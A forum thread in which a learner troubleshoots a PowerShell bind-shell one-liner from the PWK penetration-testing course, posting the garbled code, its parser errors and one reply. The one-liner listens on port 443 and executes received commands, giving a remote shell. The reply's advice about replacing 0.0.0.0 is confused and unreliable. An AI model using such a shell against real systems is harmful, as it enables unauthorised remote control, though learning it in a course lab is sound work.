Powershell bind code in manual PWK doesn't work

[Richard2022]

Hi there,

Since I am a newbie in Powershell but tend to master it, I have the following stupid question:

I'd like to make a powershell bind connection with the example in the PWK manual (page 89) but it stuck with errors:

This is the code from the manual which I used:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener(?0.0.0.0? ,443);$listener.start( );$client = $listener.AcceptTcpClient();$stream =$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendb yte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ;$tistener.Stop()?
And thiis is the error output after typing in Powershell:

powershell : At line:1 char:69
At line:1 char:1
+ powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (At line:1 char:69:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

+ ... Object System.Net.Sockets.TcpListener('0.0.0.0' ,443);.start( ); = .A ...
+ ~
An expression was expected after '('.
At line:1 char:92
+ ... ts.TcpListener('0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.Get ...
+ ~
An expression was expected after '('.
At line:1 char:107
+ ... '0.0.0.0' ,443);.start( ); = .AcceptTcpClient(); =.GetStream();[byte[ ...
+ ~
An expression was expected after '('.
At line:1 char:155
+ ... =.GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing expression after ','.
At line:1 char:156
+ ... ream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+ ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:155
+ ... =.GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing closing ')' in expression.
At line:1 char:165
+ ... am();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+ ~
Missing statement body in while loop.
At line:1 char:171
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:236
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+ ~
Missing ')' in method call.
At line:1 char:239
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+ ~
Missing expression after ',' in pipeline element.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: ( [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression

[Fred Sheehan]

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener(?0.0.0.0? ,443)

for starters, you need to change the ?0.0.0.0? to the actual IP address you want to scan...

[Richard2022]

Thank, but I find that strange.

The Kali is listening with an target IPaddress already.

So now the listener as the other machine both have an Ip Address in the code?

That's not according to the manual.

I'll try it and will come back